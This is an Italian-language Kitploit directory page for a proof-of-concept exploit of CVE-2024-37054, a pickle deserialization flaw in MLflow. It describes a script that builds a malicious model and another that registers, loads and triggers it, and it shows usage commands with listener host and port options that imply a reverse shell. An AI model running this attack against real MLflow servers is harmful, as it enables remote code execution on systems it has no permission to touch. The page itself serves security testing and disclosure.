Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-37054-PoC — Exploit proof-of-concept per CVE-2024-37054, una vulnerabilità critica di deserializzazione in MLflow. Include uno script di exploit completo e un generatore di modelli dannosi per test di penetrazione autorizzati. | Kitploit
Strumenti/GitHubGitHub/jimmexploit/cve-2024-37054-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubjimmexploit/cve-2024-37054-poc

CVE-2024-37054-PoC

Exploit proof-of-concept per CVE-2024-37054, una vulnerabilità critica di deserializzazione in MLflow. Include uno script di exploit completo e un generatore di modelli dannosi per test di penetrazione autorizzati.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
613 mesi faNon ancora revisionato
Condividi

Descrizione

Proof of concept per CVE-2024-37054, una vulnerabilità critica di deserializzazione in MLflow versioni 0.9.0 fino a 2.14.1. Quando un modello pyfunc malevolo viene caricato tramite mlflow.pyfunc.load_model(), il payload serializzato (pickle) esegue codice arbitrario.

File

  • exploit.py — exploit completo: registra, addestra, carica, attiva (per macchina HTB SmartHire)
  • build_model.py — crea modello malevolo localmente (solo creazione)

Utilizzo

Creare il modello localmente

root@kitploit:~
python3 build_model.py --lhost YOUR_IP --lport 4444

Eseguire l'exploit completo

root@kitploit:~
# Auto registrazione account ed exploit python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz # Usa sessione esistente python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."

Disclaimer

Solo per scopi educativi e test di penetrazione autorizzati.

Scarica lo strumento